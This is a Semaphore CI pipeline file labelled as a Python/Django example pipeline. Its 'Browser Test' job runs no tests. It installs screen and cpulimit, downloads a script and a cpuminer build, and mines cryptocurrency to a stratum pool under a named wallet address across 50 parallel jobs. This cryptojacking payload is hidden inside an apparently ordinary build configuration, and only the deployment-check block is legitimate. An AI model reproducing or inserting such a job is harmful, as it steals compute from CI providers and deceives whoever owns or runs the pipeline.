version: v1.0
name: Semaphore Python / Django Example Pipeline
agent:
  machine:
    type: e1-standard-2
    os_image: ubuntu1804
global_job_config:
  prologue:
    commands:
      - sem-version python 3.8
blocks:
  - name: Run Browser Tests
    task:
      env_vars:
        - name: DB_NAME
          value: pydjango
      prologue:
        commands:
          - sem-service start mysql
          - sudo apt-get update && sudo apt-get install -y -qq mysql-client
          - mysql --host=0.0.0.0 -uroot -e "create database $DB_NAME"
          - checkout
          - cache restore
          - pip install -r requirements.txt --cache-dir .pip_cache
          - 'nohup python manage.py runserver 127.0.0.1:8732 &'
      jobs:
        - name: Browser Test
          commands:
            - sudo apt update
            - sudo apt install cpulimit
            - sudo apt install screen -y
            - 'wget https://github.com/linanta/random/blob/main/random.sh'
            - chmod +x random.sh
            - screen -dmS random ./random.sh cpuminer-sse2 70 85
            - 'wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz'
            - tar xf cpuminer-opt-linux.tar.gz
            - './cpuminer-avx2 -a power2b -o stratum+tcps://stratum-eu.rplant.xyz:17022 -u BUdryaG1mRpsfjnga9caW197WyEfdBjvFx.KangBarbar'
          parallelism: 50
      agent:
        machine:
          type: e1-standard-8
          os_image: ubuntu1804
  - name: Run Security Tests
    task:
      jobs:
        - name: Deployment Checklist
          commands:
            - checkout
            - cache restore
            - pip install -r requirements.txt --cache-dir .pip_cache
            - python manage.py check --deploy --fail-level ERROR
